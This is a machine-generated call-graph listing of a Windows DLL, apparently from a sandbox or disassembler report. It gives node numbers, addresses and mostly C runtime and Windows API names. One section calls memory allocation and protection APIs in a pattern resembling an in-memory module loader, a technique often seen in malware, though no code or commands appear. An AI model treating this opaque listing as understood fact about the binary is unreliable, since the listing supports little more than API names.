16676->16678 16677 100357ef 16679 100357e4 16677->16679 16681 10035865 __lock 44 API calls 16677->16681 16680 100357ca 16678->16680 16679->16660 16682 100306e0 __mtinitlocknum 3 API calls 16680->16682 16683 1003580c 16681->16683 16682->16684 16685 10035840 16683->16685 16686 10035814 16683->16686 16684->16679 16700 100351ae 16684->16700 16687 1002e577 __mtinitlocknum 44 API calls 16685->16687 16705 100386ab 16686->16705 16692 1003582b 16687->16692 16689 1003581f 16689->16692 16709 1002e577 16689->16709 16721 1003585c 16692->16721 16694 10036507 __FF_MSGBANNER 26 API calls 16693->16694 16695 10030696 16694->16695 16696 1003635c __NMSG_WRITE 26 API calls 16695->16696 16697 1003069e 16696->16697 16698 10034524 __decode_pointer 6 API calls 16697->16698 16699 100306a9 16698->16699 16699->16658 16702 100351b7 16700->16702 16701 1002e654 _malloc 43 API calls 16701->16702 16702->16701 16703 100351ed 16702->16703 16704 100351ce Sleep 16702->16704 16703->16677 16704->16702 16706 10030e38 16705->16706 16707 100386b7 InitializeCriticalSectionAndSpinCount 16706->16707 16708 100386fb 16707->16708 16708->16689 16711 1002e583 16709->16711 16710 1002e5fc 16710->16692 16711->16710 16712 1002e5c2 16711->16712 16714 10035865 __lock 42 API calls 16711->16714 16712->16710 16713 1002e5d7 RtlFreeHeap 16712->16713 16713->16710 16715 1002e5e9 16713->16715 16718 1002e59a ___sbh_find_block 16714->16718 16716 1002e5ee GetLastError 16715->16716 16716->16710 16717 1002e5b4 16730 1002e5cd 16717->16730 16718->16717 16724 100358c8 16718->16724 16734 1003578b LeaveCriticalSection 16721->16734 16723 10035863 16723->16679 16725 10035907 16724->16725 16729 10035ba9 ___BuildCatchObjectHelper 16724->16729 16726 10035af3 VirtualFree 16725->16726 16725->16729 16727 10035b57 16726->16727 16728 10035b66 VirtualFree HeapFree 16727->16728 16727->16729 16728->16729 16729->16717 16733 1003578b LeaveCriticalSection 16730->16733 16732 1002e5d4 16732->16712 16733->16732 16734->16723 16736 10035bf1 HeapReAlloc 16735->16736 16737 10035c25 HeapAlloc 16735->16737 16738 10035c13 16736->16738 16739 10035c0f 16736->16739 16737->16739 16740 10035c48 VirtualAlloc 16737->16740 16738->16737 16739->16664 16739->16665 16740->16739 16741 10035c62 HeapFree 16740->16741 16741->16739 16742->16671 16743 10003440 16744 10003454 16743->16744 16745 1000344f 16743->16745 16747 1002e654 _malloc 44 API calls 16744->16747 16748 10003464 16744->16748 16749 100033f0 16745->16749 16747->16748 16750 1002e654 _malloc 44 API calls 16749->16750 16751 100033fe 16750->16751 16751->16744 16752 10003160 16755 10002d40 16752->16755 16790 100024a0 16755->16790 16758 10002d83 SetLastError 16781 10002d69 16758->16781 16759 10002d95 16760 100024a0 SetLastError 16759->16760 16761 10002dae 16760->16761 16762 10002dd0 SetLastError 16761->16762 16763 10002de2 16761->16763 16761->16781 16762->16781 16764 10002df1 SetLastError 16763->16764 16765 10002e03 16763->16765 16764->16781 16766 10002e0e SetLastError 16765->16766 16768 10002e20 GetNativeSystemInfo 16765->16768 16766->16781 16769 10002ed4 SetLastError 16768->16769 16770 10002ee6 VirtualAlloc 16768->16770 16769->16781 16771 10002f32 GetProcessHeap HeapAlloc 16770->16771 16772 10002f07 VirtualAlloc 16770->16772 16774 10002f6c 16771->16774 16775 10002f4c VirtualFree SetLastError 16771->16775 16772->16771 16773 10002f23 SetLastError 16772->16773 16773->16781 16776 100024a0 SetLastError 16774->16776 16775->16781 16777 10002fce 16776->16777 16778 10002fdc VirtualAlloc 16777->16778 16788 10002fd2 16777->16788 16779 1000300b 16778->16779 16793 100024d0 16779->16793 16783 1000303f 16783->16788 16803 10002ab0 16783->16803 16787 100030a8 16787->16788 16789 1000310f SetLastError 16787->16789 16788->16781 16822 10003310 16788->16822 16789->16788 16791 100024bb 16790->16791 16792 100024af SetLastError 16790->16792 16791->16758 16791->16759 16791->16781 16792->16791 16794 10002500 16793->16794 16795 10002593 16794->16795 16797 1000253c VirtualAlloc 16794->16797 16802 100025b0 16794->16802 16796 100024a0 SetLastError 16795->16796 16798 100025ac 16796->16798 16799 10002560 16797->16799 16800 10002567 16797->16800 16801 100025b4 VirtualAlloc 16798->16801 16798->16802 16799->16802 16800->16794 16801->16802 16802->16783 16804 10002ae9 IsBadReadPtr 16803->16804 16814 10002adf 16803->16814 16806 10002b13 16804->16806 16804->16814 16807 10002b45 SetLastError 16806->16807 16808 10002b59 16806->16808 16806->16814 16807->16814 16829 100023c0 16808->16829 16811 10002ba9 16811->16814 16815 10002cb9 SetLastError 16811->16815 16812 10002b7f SetLastError 16812->16814 16814->16788 16816 100027c0 16814->16816 16815->16814 16820 10002808 16816->16820 16817 10002911 16818 10002690 2 API calls 16817->16818 16819 100028ed 16818->16819 16819->16787 16820->16817 16820->16819 16844 10002690 16820->16844 16823 10003325 16822->16823 16826 1000332a 16822->16826 16823->16781 16824 100033c0 VirtualFree 16825 100033d4 GetProcessHeap HeapFree 16824->16825 16825->16823 16827 10002370 VirtualFree 16826->16827 16828 100033b4 16826->16828 16827->16828 16828->16824 16828->16825 16830 100023d5 16829->16830 16831 100023cc 16829->16831 16834 100023e3 16830->16834 16840 10002390 VirtualAlloc 16830->16840 16837 100022a0 16831->16837 16834->16811 16834->16812 16835 100023f1 16835->16834 16841 10002370 16835->16841 16838 100022b0 VirtualQuery 16837->16838 16839 100022ac 16837->16839 16838->16839 16839->16830 16840->16835 16842 10002379 VirtualFree 16841->16842 16843 1000238a 16841->16843 16842->16843 16843->16834 16845 100026ac 16844->16845 16847 100026a2 16844->16847 16846 100026ba 16845->16846 16849 10002714 VirtualProtect 16845->16849 16846->16847 16850 100026f2 VirtualFree 16846->16850 16847->16820 16849->16847 16850->16847 16851 10024d50 16856 1002b0bb 16851->16856 16853 10024d5f 16854 10024d82 16853->16854 16861 1002acfb 16853->16861 16859 1002b0c7 __EH_prolog3 16856->16859 16858 1002b115 ctype 16858->16853 16859->16858 16869 1002adac EnterCriticalSection 16859->16869 16884 10023b5b 16859->16884 16862 1002ad07 __EH_prolog3_catch 16861->16862 16863 1002ad30 ctype 16862->16863 16945 1002a6ab 16862->16945 16863->16853 16865 1002ad16 16866 1002ad23 16865->16866 16955 10024d0b 16865->16955 16958 1002a71d 16866->16958 16870 1002adcf 16869->16870 16872 1002ae08 16870->16872 16873 1002ae1d GlobalHandle GlobalUnlock 16870->16873 16882 1002ae8e _memset 16870->16882 16871 1002aea5 LeaveCriticalSection 16871->16859 16891 10023778 16872->16891 16875 10023778 ctype 3 API calls 16873->16875 16877 1002ae3b GlobalReAlloc 16875->16877 16878 1002ae47 16877->16878 16879 1002ae6e GlobalLock 16878->16879 16880 1002ae52 GlobalHandle GlobalLock 16878->16880 16881 1002ae60 LeaveCriticalSection 16878->16881 16879->16882 16880->16881 16895 10023b23 16881->16895 16882->16871 16885 100312cd __CxxThrowException@8 RaiseException 16884->16885 16886 10023b76 16885->16886 16887 10031319 __cftof 2 API calls 16886->16887 16888 10023b8d 16887->16888 16889 100210ff 3 API calls 16888->16889 16890 10023b93 16889->16890 16890->16859 16892 1002378d ctype 16891->16892 16893 1002379a GlobalAlloc 16892->16893 16906 10001650 16892->16906 16893->16878 16910 100312cd 16895->16910 16897 10023b3e 16898 100312cd __CxxThrowException@8 RaiseException 16897->16898 16899 10023b5a 16898->16899 16900 100312cd __CxxThrowException@8 RaiseException 16899->16900 16901 10023b76 16900->16901 16913 10031319 16901->16913 16905 10023b93 16905->16879 16907 1000165c 16906->16907 16909 10001661 16906->16909 16908 10023b23 ctype 3 API calls 16907->16908 16908->16909 16909->16893 16911 10031302 RaiseException 16910->16911 16912 100312f6 16910->16912 16911->16897 16912->16911 16929 1003a6c5 16913->16929 16915 10023b8d 16916 100210ff 16915->16916 16917 1002110b 16916->16917 16918 10021129 16916->16918 16919 10021110 16917->16919 16920 100312cd __CxxThrowException@8 RaiseException 16917->16920 16918->16905 16919->16918 16921 100312cd __CxxThrowException@8 RaiseException 16919->16921 16922 10023b3e 16920->16922 16923 10023b76 16921->16923 16924 100312cd __CxxThrowException@8 RaiseException 16922->16924 16925 10031319 __cftof 2 API calls 16923->16925 16924->16919 16926 10023b8d 16925->16926 16927 100210ff 3 API calls 16926->16927 16928 10023b93 16927->16928 16928->16905 16930 1003a6d9 16929->16930 16931 1003a73f _LocaleUpdate::_LocaleUpdate 16930->16931 16939 1003a6dd __NMSG_WRITE 16930->16939 16932 1003a767 16931->16932 16931->16939 16935 1003a7a3 16932->16935 16936 1003a86b 16932->16936 16934 100318ee __mbsnbcpy_s_l _LocaleUpdate::_LocaleUpdate 16934->16936 16937 1003a7d5 16935->16937 16940 100318ee 16935->16940 16936->16934 16936->16939 16938 100318ee __mbsnbcpy_s_l _LocaleUpdate::_LocaleUpdate 16937->16938 16937->16939 16938->16937 16939->16915 16943 1003189b _LocaleUpdate::_LocaleUpdate 16940->16943 16944 100318be 16943->16944 16944->16935 16946 1002a6c0 16945->16946 16947 1002a6bb 16945->16947 16949 1002a6ce 16946->16949 16962 1002a687 16946->16962 16948 10023b5b ~_Task_impl 3 API calls 16947->16948 16948->16946 16951 1002a6e0 EnterCriticalSection 16949->16951 16952 1002a70a EnterCriticalSection 16949->16952 16953 1002a6ff LeaveCriticalSection 16951->16953 16954 1002a6ec InitializeCriticalSection 16951->16954 16952->16865 16953->16952 16954->16953 16965 10024bd0 16955->16965 16957 10024d17 16957->16866 16959 1002a72a 16958->16959 16960 1002a72f LeaveCriticalSection 16958->16960 16961 10023b5b ~_Task_impl 3 API calls 16959->16961 16960->16863 16961->16960 16963 1002a690 InitializeCriticalSection 16962->16963 16964 1002a6a5 16962->16964 16963->16964 16964->16949 16966 10024bdc __EH_prolog3_catch 16965->16966 16979 1001e8f0 16966->16979 16972 10024c76 16974 10024c97 16972->16974 16991 100248e2 16972->16991 16976 10024cbc 16974->16976 16997 10024b06 16974->16997 16978 10024ce2 ctype 16976->16978 17003 10024b89 16976->17003 16978->16957 16980 1001e8fe 16979->16980 16981 10001650 ctype 3 API calls 16980->16981 16982 1001e921 16980->16982 16981->16980 16983 1001ed40 16982->16983 16984 1001ed82 16983->16984 16985 1001ed76 16983->16985 16987 10020421 16984->16987 17009 1001f370 16985->17009 16989 10020429 16987->16989 16988 1002e654 _malloc 44 API calls 16988->16989 16989->16988 16990 1002044b 16989->16990 16990->16972 16992 100248ee __EH_prolog3 16991->16992 17046 10021b88 16992->17046 16994 100248fd 17054 10024854 16994->17054 16996 1002490d ctype 16996->16974 16998 10024b12 __EH_prolog3 16997->16998 16999 10021b88 70 API calls 16998->16999 17000 10024b21 16999->17000 17001 10024854 4 API calls 17000->17001 17002 10024b31 ctype 17001->17002 17002->16976 17004 10024b95 __EH_prolog3 17003->17004 17005 10021b88 70 API calls 17004->17005 17006 10024ba4 17005->17006 17007 10024854 4 API calls 17006->17007 17008 10024bb3 ctype 17007->17008 17008->16978 17010 1001f38f 17009->17010 17011 1001f3ab 17010->17011 17014 1001f3b9 17010->17014 17016 1001fb60 17011->17016 17013 1001f3b7 17013->16984 17014->17013 17024 1001fc30 17014->17024 17017 1001fb8e 17016->17017 17031 100236ce 17017->17031 17019 1001fbb1 17038 1002e804 17019->17038 17022 1001fbeb 17022->17013 17025 1001fc57 17024->17025 17026 1001fc5d 17024->17026 17025->17026 17027 1001fc64 17025->17027 17028 1001fb50 3 API calls 17026->17028 17029 1001fc62 17027->17029 17030 1001fb50 3 API calls 17027->17030 17028->17029 17029->17013 17030->17029 17032 100236e2 17031->17032 17033 1001fba3 17031->17033 17034 1002e654 _malloc 44 API calls 17032->17034 17033->17019 17035 1001fb50 17033->17035 17034->17033 17036 10001650 ctype 3 API calls 17035->17036 17037 1001fb5d 17036->17037 17037->17019 17039 1002e818 17038->17039 17041 1002e814 _memset 17038->17041 17039->17041 17042 1002db20 17039->17042 17041->17022 17043 1002db38 17042->17043 17044 1002db67 17043->17044 17045 1002db5f __VEC_memcpy 17043->17045 17044->17041 17045->17044 17047 10021b94 __EH_prolog3 17046->17047 17057 1001eb70 17047->17057 17051 10021bc2 ctype 17051->16994 17113 100221d6 17054->17113 17058 1001eb79 17057->17058 17059 10001650 ctype 3 API calls 17058->17059 17060 1001eb99 17058->17060 17059->17058 17061 10021955 17060->17061 17062 10021961 17061->17062 17064 10021974 17061->17064 17062->17064 17069 10021931 17062->17069 17064->17051 17065 1001e950 17064->17065 17066 1001e95f _strlen 17065->17066 17103 1001f240 17066->17103 17068 1001e987 17068->17051 17074 1002b1bf 17069->17074 17072 10021950 17072->17064 17086 10024d50 17074->17086 17077 10021885 17091 100211e0 FindResourceA 17077->17091 17079 1002189a 17085 100218ca 17079->17085 17096 10021259 WideCharToMultiByte 17079->17096 17081 100218b1 17082 1001ed40 48 API calls 17081->17082 17083 100218be 17082->17083 17097 10021275 WideCharToMultiByte 17083->17097 17085->17072 17087 1002b0bb ctype 13 API calls 17086->17087 17088 10024d5f 17087->17088 17089 10021941 17088->17089 17090 1002acfb ctype 70 API calls 17088->17090 17089->17072 17089->17077 17090->17088 17092 10021201 17091->17092 17093 100211ff 17091->17093 17098 10021183 LoadResource 17092->17098 17093->17079 17095 1002120d 17095->17079 17096->17081 17097->17085 17099 1002119a LockResource 17098->17099 17100 10021198 17098->17100 17101 100211a8 SizeofResource 17099->17101 17102 100211be 17099->17102 17100->17095 17101->17102 17102->17095 17104 1001f25c 17103->17104 17105 1001f24f 17103->17105 17106 1001f26c 17104->17106 17107 10001650 ctype 3 API calls 17104->17107 17105->17068 17108 1001f2c7 17106->17108 17109 1001f370 48 API calls 17106->17109 17107->17106 17110 1001f2dd _memmove_s 17108->17110 17111 1002e804 _memcpy_s __VEC_memcpy 17108->17111 17109->17108 17110->17105 17112 10001650 ctype 3 API calls 17110->17112 17111->17110 17112->17105 17116 10022179 17113->17116 17119 1001f410 17116->17119 17120 1001f430 17119->17120 17121 1001f48a 17120->17121 17122 1001fb50 3 API calls 17120->17122 17124 1001f450 17120->17124 17123 1002e804 _memcpy_s __VEC_memcpy 17121->17123 17122->17121 17123->17124 17124->16996 17125 1002eaac 17126 1002eab7 17125->17126 17127 1002eabc 17125->17127 17143 1003732f 17126->17143 17131 1002e9b6 17127->17131 17130 1002eaca 17133 1002e9c2 17131->17133 17132 1002ea0f 17140 1002ea5f 17132->17140 17193 10008080 17132->17193 17133->17132 17133->17140 17147 1002e881 17133->17147 17140->17130 17144 10037361 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 17143->17144 17145 10037354 17143->17145 17146 10037358 17144->17146 17145->17144 17145->17146 17146->17127 17148 1002e890 17147->17148 17149 1002e90c 17147->17149 17197 10035645 HeapCreate 17148->17197 17150 1002e912 17149->17150 17151 1002e943 17149->17151 17155 1002e89b 17150->17155 17158 1002e92d 17150->17158 17311 10030912 17150->17311 17153 1002e9a1 17151->17153 17154 1002e948 17151->17154 17153->17155 17343 100348b9 17153->17343 17314 1003459f TlsGetValue 17154->17314 17155->17132 17158->17155 17159 1002e932 __ioterm 17158->17159 17164 100345d3 __mtterm 47 API calls 17159->17164 17167 1002e93c 17164->17167 17165 1002e8a7 __RTC_Initialize 17168 1002e8ab 17165->17168 17172 1002e8b7 GetCommandLineA 17165->17172 17170 10035675 __heap_term 4 API calls 17167->17170 17294 10035675 17168->17294 17170->17155 17233 1003702b 17172->17233 17173 10034524 __decode_pointer 6 API calls 17175 1002e977 17173->17175 17178 1002e995 17175->17178 17179 1002e97e 17175->17179 17182 1002e577 __mtinitlocknum 44 API calls 17178->17182 17325 10034610 17179->17325 17180 1002e8d1 17183 1002e8d5 17180->17183 17184 1002e8dc __setargv 17180->17184 17182->17155 17300 100345d3 17183->17300 17186 1002e905 __ioterm 17184->17186 17187 1002e8e5 17184->17187 17185 1002e985 GetCurrentThreadId 17185->17155 17186->17183 17275 10036cf8 17187->17275 17192 1002e8f5 17192->17155 17192->17186 17194 1000809c 17193->17194 17810 10008000 17194->17810 17198 1002e896 17197->17198 17198->17155 17199 10034927 GetModuleHandleW 17198->17199 17200 10034942 17199->17200 17201 1003493b 17199->17201 17202 10034aaa 17200->17202 17203 1003494c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 17200->17203 17204 1003065c __crt_waiting_on_module_handle 2 API calls 17201->17204 17206 100345d3 __mtterm 47 API calls 17202->17206 17205 10034995 TlsAlloc 17203->17205 17207 10034941 17204->17207 17209 10034aaf 17205->17209 17210 100349e3 TlsSetValue 17205->17210 17206->17209 17207->17200 17209->17165 17210->17209 17211 100349f4 17210->17211 17354 10030921 17211->17354 17214 100344a9 __encode_pointer 6 API calls 17215 10034a04 17214->17215 17216 100344a9 __encode_pointer 6 API calls 17215->17216 17217 10034a14 17216->17217 17218 100344a9 __encode_pointer 6 API calls 17217->17218 17219 10034a24 17218->17219 17220 100344a9 __encode_pointer 6 API calls 17219->17220 17221 10034a34 17220->17221 17361 100356e9 17221->17361 17224 10034524 __decode_pointer 6 API calls 17225 10034a55 17224->17225 17225->17202 17226 100351f3 __calloc_crt 46 API calls 17225->17226 17227 10034a6e 17226->17227 17227->17202 17228 10034524 __decode_pointer 6 API calls 17227->17228 17229 10034a88 17228->17229 17229->17202 17230 10034a8f 17229->17230 17231 10034610 __getptd_noexit 56 API calls 17230->17231 17232 10034a97 GetCurrentThreadId 17231->17232 17232->17209 17234 10037068 17233->17234 17235 10037049 GetEnvironmentStringsW 17233->17235 17236 10037051 17234->17236 17238 10037101 17234->17238 17235->17236 17237 1003705d GetLastError 17235->17237 17240 10037084 GetEnvironmentStringsW 17236->17240 17247 10037093 WideCharToMultiByte 17236->17247 17237->17234 17239 1003710a GetEnvironmentStrings 17238->17239 17244 1002e8c7 17238->17244 17239->17244 17246 1003711a 17239->17246 17240->17244 17240->17247 17242 100370c7 17249 100351ae __malloc_crt 44 API calls 17242->17249 17243 100370f6 FreeEnvironmentStringsW 17243->17244 17260 10036a56 17244->17260 17245 10037128 17248 100351ae __malloc_crt 44 API calls 17245->17248 17246->17245 17246->17246 17247->17242 17247->17243 17250 10037134 17248->17250 17251 100370cd 17249->17251 17252 10037147 17250->17252 17253 1003713b FreeEnvironmentStringsA 17250->17253 17251->17243 17254 100370d5 WideCharToMultiByte 17251->17254 17255 1002db20 ___crtGetEnvironmentStringsA __VEC_memcpy 17252->17255 17253->17244 17256 100370ef 17254->17256 17257 100370e7 17254->17257 17258 10037151 FreeEnvironmentStringsA 17255->17258 17256->17243 17259 1002e577 __mtinitlocknum 44 API calls 17257->17259 17258->17244 17259->17256 17261 10030e38 17260->17261 17262 10036a62 GetStartupInfoA 17261->17262 17263 100351f3 __calloc_crt 46 API calls 17262->17263 17266 10036a83 17263->17266 17264 10036ca1 17264->17180 17265 10036b6b 17265->17264 17269 10036be8 17265->17269 17273 10036b94 GetFileType 17265->17273 17274 100386ab __mtinitlocknum InitializeCriticalSectionAndSpinCount 17265->17274 17266->17264 17266->17265 17266->17269 17270 100351f3 __calloc_crt 46 API calls 17266->17270 17267 10036c1e GetStdHandle 17267->17269 17268 10036c83 SetHandleCount 17268->17264 17269->17264 17269->17267 17269->17268 17271 10036c30 GetFileType 17269->17271 17272 100386ab __mtinitlocknum InitializeCriticalSectionAndSpinCount 17269->17272 17270->17266 17271->17269 17272->17269 17273->17265 17274->17265 17276 10036d01 17275->17276 17279 10036d06 _strlen 17275->17279 17368 100334dc 17276->17368 17278 100351f3 __calloc_crt 46 API calls 17284 10036d3b _strcpy_s _strlen 17278->17284 17279->17278 17282 1002e8ea 17279->17282 17280 10036d99 17281 1002e577 __mtinitlocknum 44 API calls 17280->17281 17281->17282 17282->17186 17288 1003074b 17282->17288 17283 100351f3 __calloc_crt 46 API calls 17283->17284 17284->17280 17284->17282 17284->17283 17285 10036dbf 17284->17285 17287 10036d80 __invoke_watson 17284->17287 17286 1002e577 __mtinitlocknum 44 API calls 17285->17286 17286->17282 17287->17284 17290 10030759 __IsNonwritableInCurrentImage 17288->17290 17470 1003817c 17290->17470 17291 10030777 __initterm_e 17293 10030796 __IsNonwritableInCurrentImage __initterm 17291->17293 17474 1002e391 17291->17474 17293->17192 17295 100356d5 HeapDestroy 17294->17295 17296 1003567e 17294->17296 17295->17155 17297 100356c3 HeapFree 17296->17297 17298 1003569a VirtualFree HeapFree 17296->17298 17297->17295 17298->17298 17299 100356c2 17298->17299 17299->17297 17301 100345e9 17300->17301 17302 100345dd 17300->17302 17304 100345fd TlsFree 17301->17304 17305 1003460b 17301->17305 17303 10034524 __decode_pointer 6 API calls 17302->17303 17303->17301 17304->17305 17306 10035750 DeleteCriticalSection 17305->17306 17307 10035768 17305->17307 17308 1002e577 __mtinitlocknum 44 API calls 17306->17308 17309 1003577a DeleteCriticalSection 17307->17309 17310 10035788 17307->17310 17308->17305 17309->17307 17310->17168 17564 100307d0 17311->17564 17313 1003091d 17313->17158 17315 100345b4 17314->17315 17316 1002e94d 17314->17316 17317 10034524 __decode_pointer 6 API calls 17315->17317 17319 100351f3 17316->17319 17318 100345bf TlsSetValue 17317->17318 17318->17316 17321 100351fc 17319->17321 17322 1002e959 17321->17322 17323 1003521a Sleep 17321->17323 17587 1003b872 17321->17587 17322->17155 17322->17173 17324 1003522f 17323->17324 17324->17321 17324->17322 17326 10030e38 17325->17326 17327 1003461c GetModuleHandleW 17326->17327 17328 10034632 17327->17328 17329 1003462c 17327->17329 17331 1003464a GetProcAddress GetProcAddress 17328->17331 17332 1003466e 17328->17332 17330 1003065c __crt_waiting_on_module_handle 2 API calls 17329->17330 17330->17328 17331->17332 17333 10035865 __lock 44 API calls 17332->17333 17334 1003468d InterlockedIncrement 17333->17334 17599 100346e5 17334->17599 17337 10035865 __lock 44 API calls 17338 100346ae 17337->17338 17602 10033643 InterlockedIncrement 17338->17602 17340 100346cc 17614 100346ee 17340->17614 17342 100346d9 17342->17185 17344 10034912 17343->17344 17345 100348c7 17343->17345 17346 10034925 17344->17346 17347 1003491c TlsSetValue 17344->17347 17348 100348f0 17345->17348 17349 100348cd TlsGetValue 17345->17349 17346->17155 17347->17346 17350 10034524 __decode_pointer 6 API calls 17348->17350 17349->17348 17351 100348e0 TlsGetValue 17349->17351 17352 10034907 17350->17352 17351->17348 17619 1003478a 17352->17619 17355 1003451b _raise 6 API calls 17354->17355 17356 10030929 __init_pointers __initp_misc_winsig 17355->17356 17365 10038115 17356->17365 17359 100344a9 __encode_pointer 6 API calls 17360 10030965 17359->17360 17360->17214 17362 100356f4 17361->17362 17363 10034a41 17362->17363 17364 100386ab __mtinitlocknum InitializeCriticalSectionAndSpinCount 17362->17364 17363->17202 17363->17224 17364->17362 17366 100344a9 __encode_pointer 6 API calls 17365->17366 17367 1003095b 17366->17367 17367->17359 17369 100334ec 17368->17369 17370 100334e5 17368->17370 17369->17279 17372 10033342 17370->17372 17373 1003334e 17372->17373 17401 10034770 17373->17401 17377 10033361 17422 100330e1 _LocaleUpdate::_LocaleUpdate 17377->17422 17380 100351ae __malloc_crt 44 API calls 17381 10033382 17380->17381 17388 100334a1 17381->17388 17427 1003315d 17381->17427 17384 100333b2 InterlockedDecrement 17386 100333d3 InterlockedIncrement 17384->17386 17387 100333c2 17384->17387 17385 100334ae 17385->17388 17390 1002e577 __mtinitlocknum 44 API calls 17385->17390 17386->17388 17389 100333e9 17386->17389 17387->17386 17391 1002e577 __mtinitlocknum 44 API calls 17387->17391 17388->17369 17389->17388 17393 10035865 __lock 44 API calls 17389->17393 17390->17388 17392 100333d2 17391->17392 17392->17386 17395 100333fd InterlockedDecrement 17393->17395 17396 10033479 17395->17396 17397 1003348c InterlockedIncrement 17395->17397 17396->17397 17399 1002e577 __mtinitlocknum 44 API calls 17396->17399 17439 100334a3 17397->17439 17400 1003348b 17399->17400 17400->17397 17442 100346f7 GetLastError 17401->17442 17403 10034778 17404 10033357 17403->17404 17405 1003068c __amsg_exit 26 API calls 17403->17405 17406 1003303d 17404->17406 17405->17404 17407 10033049 17406->17407 17408 10034770 __getptd 63 API calls 17407->17408 17409 1003304e 17408->17409 17410 10035865 __lock 44 API calls 17409->17410 17411 10033060 17409->17411 17412 1003307e 17410->17412 17414 1003306e 17411->17414 17418 1003068c __amsg_exit 26 API calls 17411->17418 17413 100330c7 17412->17413 17415 10033095 InterlockedDecrement 17412->17415 17416 100330af InterlockedIncrement 17412->17416 17456 100330d8 17413->17456 17414->17377 17415->17416 17419 100330a0 17415->17419 17416->17413 17418->17414 17419->17416 17420 1002e577 __mtinitlocknum 44 API calls 17419->17420 17421 100330ae 17420->17421 17421->17416 17423 10033100 GetOEMCP 17422->17423 17424 1003311e 17422->17424 17426 10033110 17423->17426 17425 10033123 GetACP 17424->17425 17424->17426 17425->17426 17426->17380 17426->17388 17428 100330e1 getSystemCP 3 API calls 17427->17428 17433 1003317d 17428->17433 17429 10033188 setSBCS 17432 10033330 17429->17432 17431 10033340 17431->17384 17431->17385 17460 1002db0d 17432->17460 17433->17429 17433->17432 17434 100331cc IsValidCodePage 17433->17434 17438 100331f1 _memset 17433->17438 17434->17432 17435 100331de GetCPInfo 17434->17435 17436 10033324 17435->17436 17435->17438 17436->17429 17436->17432 17437 100332cc setSBUpLow 17437->17438 17438->17437 17469 1003578b LeaveCriticalSection 17439->17469 17441 100334aa 17441->17388 17443 1003459f ___set_flsgetvalue 8 API calls 17442->17443 17444 1003470e 17443->17444 17445 10034764 SetLastError 17444->17445 17446 100351f3 __calloc_crt 46 API calls 17444->17446 17445->17403 17447 10034722 17446->17447 17447->17445 17448 10034524 __decode_pointer 6 API calls 17447->17448 17449 1003473c 17448->17449 17450 10034743 17449->17450 17451 1003475b 17449->17451 17452 10034610 __getptd_noexit 56 API calls 17450->17452 17453 1002e577 __mtinitlocknum 44 API calls 17451->17453 17454 1003474b GetCurrentThreadId 17452->17454 17455 10034761 17453->17455 17454->17445 17455->17445 17459 1003578b LeaveCriticalSection 17456->17459 17458 100330df 17458->17411 17459->17458 17461 1002db17 IsDebuggerPresent 17460->17461 17462 1002db15 17460->17462 17468 1003b990 17461->17468 17462->17431 17465 10031d4c SetUnhandledExceptionFilter UnhandledExceptionFilter 17466 10031d71 GetCurrentProcess TerminateProcess 17465->17466 17467 10031d69 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 17465->17467 17466->17431 17467->17466 17468->17465 17469->17441 17471 10038182 17470->17471 17472 100344a9 __encode_pointer 6 API calls 17471->17472 17473 1003819a 17471->17473 17472->17471 17473->17291 17477 1002e355 17474->17477 17476 1002e39e 17476->17293 17478 1002e361 17477->17478 17485 100306f8 17478->17485 17484 1002e382 17484->17476 17486 10035865 __lock 44 API calls 17485->17486 17487 1002e366 17486->17487 17488 1002e26a 17487->17488 17489 10034524 __decode_pointer 6 API calls 17488->17489 17490 1002e27e 17489->17490 17491 10034524 __decode_pointer 6 API calls 17490->17491 17492 1002e28e 17491->17492 17502 1002e311 17492->17502 17511 100317be 17492->17511 17494 1002e2ac 17497 1002e2d6 17494->17497 17498 1002e2c7 17494->17498 17507 1002e2f8 17494->17507 17495 100344a9 __encode_pointer 6 API calls 17496 1002e306 17495->17496 17499 100344a9 __encode_pointer 6 API calls 17496->17499 17497->17502 17503 1002e2d0 17497->17503 17519 1003523f 17498->17519 17499->17502 17501 1003523f __realloc_crt 52 API calls 17505 1002e2e6 17501->17505 17508 1002e38b 17502->17508 17503->17497 17503->17501 17504 1002e2ec 17503->17504 17506 100344a9 __encode_pointer 6 API calls 17504->17506 17505->17502 17505->17504 17506->17507 17507->17495 17560 10030701 17508->17560 17512 100317ca 17511->17512 17513 10031838 HeapSize 17512->17513 17514 10035865 __lock 44 API calls 17512->17514 17515 100317da 17512->17515 17513->17515 17516 10031807 ___sbh_find_block 17514->17516 17515->17494 17524 10031858 17516->17524 17521 10035248 17519->17521 17522 10035287 17521->17522 17523 10035268 Sleep 17521->17523 17528 1003102c 17521->17528 17522->17503 17523->17521 17527 1003578b LeaveCriticalSection 17524->17527 17526 10031833 17526->17513 17526->17515 17527->17526 17529 10031038 17528->17529 17530 1003103f 17529->17530 17531 1003104d 17529->17531 17534 1002e654 _malloc 44 API calls 17530->17534 17532 10031060 17531->17532 17533 10031054 17531->17533 17540 100311d2 17532->17540 17551 1003106d ___sbh_find_block 17532->17551 17535 1002e577 __mtinitlocknum 44 API calls 17533->17535 17546 10031047 17534->17546 17535->17546 17536 10031205 17537 1003654f _realloc 6 API calls 17536->17537 17537->17546 17538 10035865 __lock 44 API calls 17538->17551 17539 100311d7 HeapReAlloc 17539->17540 17539->17546 17540->17536 17540->17539 17541 1003654f _realloc 6 API calls 17540->17541 17542 1003119b 17540->17542 17553 100311b8 17540->17553 17541->17540 17542->17546 17549 100311a5 GetLastError 17542->17549 17543 10031232 GetLastError 17543->17546 17545 100310a0 ___sbh_resize_block 17545->17551 17546->17521 17547 100310f8 HeapAlloc 17547->17551 17548 10036077 ___sbh_alloc_block 5 API calls 17548->17551 17549->17546 17550 1003114d HeapReAlloc 17550->17551 17551->17536 17551->17538 17551->17542 17551->17545 17551->17546 17551->17547 17551->17548 17551->17550 17552 1002db20 __VEC_memcpy ___crtGetEnvironmentStringsA 17551->17552 17551->17553 17554 1003654f _realloc 6 API calls 17551->17554 17555 100358c8 VirtualFree VirtualFree HeapFree ___sbh_free_block 17551->17555 17556 10031170 17551->17556 17552->17551 17553->17543 17553->17546 17554->17551 17555->17551 17559 1003578b LeaveCriticalSection 17556->17559 17558 10031177 17558->17551 17559->17558 17563 1003578b LeaveCriticalSection 17560->17563 17562 1002e390 17562->17484 17563->17562 17565 100307dc 17564->17565 17566 10035865 __lock 44 API calls 17565->17566 17567 100307e3 17566->17567 17569 10034524 __decode_pointer 6 API calls 17567->17569 17573 1003089c __initterm 